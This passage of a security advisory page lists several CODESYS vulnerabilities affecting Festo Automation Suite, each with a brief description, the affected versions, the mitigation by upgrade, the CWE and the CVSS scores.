<p><strong>Mitigation</strong><br>Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo.</p>
<p><strong>Mitigation</strong><br>The following product versions have been fixed:</p>
<p><strong>Mitigation</strong><br>CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs</p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json">https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json</a></p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://certvde.com/en/advisories/VDE-2025-108">https://certvde.com/en/advisories/VDE-2025-108</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/125.html">CWE-125 Out-of-bounds Read</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>6.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2022-32140</a></h3>
<div class="csaf-accordion-content">
<p>Multiple CODESYS products are affected to a buffer overflow.A low privileged remote attacker may craft a request, which can cause a buffer copy without checking the size of the service, resulting in a denial-of-service condition. User Interaction is not required.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2022-32140">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>CODESYS in Festo Automation Suite</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>FESTO, CODESYS</div>
<div class="ics-version"><strong>Product Version:</strong><br>FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk:</p>
<p><strong>Mitigation</strong><br>Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo.</p>
<p><strong>Mitigation</strong><br>The following product versions have been fixed:</p>
<p><strong>Mitigation</strong><br>CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs</p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json">https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json</a></p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://certvde.com/en/advisories/VDE-2025-108">https://certvde.com/en/advisories/VDE-2025-108</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/120.html">CWE-120 Buffer Copy without Checking Size of Input ('Classic Buffer Overflow')</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>6.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2022-32141</a></h3>
<div class="csaf-accordion-content">
<p>Multiple CODESYS Products are prone to a buffer over read. A low privileged remote attacker may craft a request with an invalid offset, which can cause an internal buffer over-read, resulting in a denial-of-service condition. User interaction is not required.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2022-32141">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>CODESYS in Festo Automation Suite</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>FESTO, CODESYS</div>
<div class="ics-version"><strong>Product Version:</strong><br>FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk:</p>
<p><strong>Mitigation</strong><br>Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo.</p>
<p><strong>Mitigation</strong><br>The following product versions have been fixed:</p>
<p><strong>Mitigation</strong><br>CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs</p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json">https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json</a></p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://certvde.com/en/advisories/VDE-2025-108">https://certvde.com/en/advisories/VDE-2025-108</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/126.html">CWE-126 Buffer Over-read</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>6.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2022-32142</a></h3>
<div class="csaf-accordion-content">
<p>Multiple CODESYS Products are prone to a out-of bounds read or write access. A low privileged remote attacker may craft a request with invalid offset, which can cause an out-of-bounds read or write access, resulting in denial-of-service condition or local memory overwrite, which can lead to a change of local files. User interaction is not required.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2022-32142">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>CODESYS in Festo Automation Suite</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>FESTO, CODESYS</div>
<div class="ics-version"><strong>Product Version:</strong><br>FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk:</p>
<p><strong>Mitigation</strong><br>Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo.</p>
<p><strong>Mitigation</strong><br>The following product versions have been fixed:</p>
<p><strong>Mitigation</strong><br>CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs</p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json">https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json</a></p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://certvde.com/en/advisories/VDE-2025-108">https://certvde.com/en/advisories/VDE-2025-108</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/823.html">CWE-823 Use of Out-of-range Pointer Offset</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.0</td>
<td>8.1</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H">CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2022-32143</a></h3>
<div class="csaf-accordion-content">
<p>In multiple CODESYS products, file download and upload function allows access to internal files in the working directory e.g. firmware files of the PLC. All requests are processed on the controller only if no level 1 password is configured on the controller or if remote attacker has previously successfully authenticated himself to the controller. A successful Attack may lead to a denial of service, change of local files, or drain of confidential Information. User interaction is not required</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2022-32143">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>CODESYS in Festo Automation Suite</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>FESTO, CODESYS</div>
<div class="ics-version"><strong>Product Version:</strong><br>FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk:</p>
<p><strong>Mitigation</strong><br>Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo.</p>
<p><strong>Mitigation</strong><br>The following product versions have been fixed:</p>
<p><strong>Mitigation</strong><br>CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs</p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json">https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json</a></p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://certvde.com/en/advisories/VDE-2025-108">https://certvde.com/en/advisories/VDE-2025-108</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/552.html">CWE-552 Files or Directories Accessible to External Parties</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>8.8</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H">CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2022-4046</a></h3>
<div class="csaf-accordion-content">
<p>In CODESYS Control in multiple versions a improper restriction of operations within the bounds of a memory buffer allow an remote attacker with user privileges to gain full access of the device.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2022-4046">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>CODESYS in Festo Automation Suite</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>FESTO, CODESYS</div>
<div class="ics-version"><strong>Product Version:</strong><br>FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk:</p>
<p><strong>Mitigation</strong><br>Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo.</p>
<p><strong>Mitigation</strong><br>The following product versions have been fixed:</p>
<p><strong>Mitigation</strong><br>CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs</p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json">https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json</a></p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://certvde.com/en/advisories/VDE-2025-108">https://certvde.com/en/advisories/VDE-2025-108</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/119.html">CWE-119 Improper Restriction of Operations within the Bounds of a Memory Buffer</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.0</td>
<td>8.8</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H">CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2022-4048</a></h3>
<div class="csaf-accordion-content">
<p>Inadequate Encryption Strength in CODESYS Development System V3 versions prior to V3.5.18.40 allows an unauthenticated local attacker to access and manipulate code of the encrypted boot application.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2022-4048">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>CODESYS in Festo Automation Suite</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>FESTO, CODESYS</div>
<div class="ics-version"><strong>Product Version:</strong><br>FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk:</p>
<p><strong>Mitigation</strong><br>Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo.</p>
<p><strong>Mitigation</strong><br>The following product versions have been fixed:</p>
<p><strong>Mitigation</strong><br>CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs</p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json">https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json</a></p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://certvde.com/en/advisories/VDE-2025-108">https://certvde.com/en/advisories/VDE-2025-108</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/326.html">CWE-326 Inadequate Encryption Strength</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>7.7</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N">CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2022-4224</a></h3>
<div class="csaf-accordion-content">
<p>In multiple products of CODESYS v3 in multiple versions a remote low privileged user could utilize this vulnerability to read and modify system files and OS resources or DoS the device.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2022-4224">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>CODESYS in Festo Automation Suite</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>FESTO, CODESYS</div>
<div class="ics-version"><strong>Product Version:</strong><br>FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk:</p>
<p><strong>Mitigation</strong><br>Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo.</p>
<p><strong>Mitigation</strong><br>The following product versions have been fixed:</p>
<p><strong>Mitigation</strong><br>CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs</p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json">https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json</a></p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://certvde.com/en/advisories/VDE-2025-108">https://certvde.com/en/advisories/VDE-2025-108</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/1188.html">CWE-1188 Initialization of a Resource with an Insecure Default</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>8.8</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H">CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2022-47378</a></h3>
<div class="csaf-accordion-content">
<p>Multiple CODESYS products in multiple versions are prone to a improper input validation vulnerability. An authenticated remote attacker may craft specific requests that use the vulnerability leading to a denial-of-service condition.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2022-47378">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>CODESYS in Festo Automation Suite</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>FESTO, CODESYS</div>
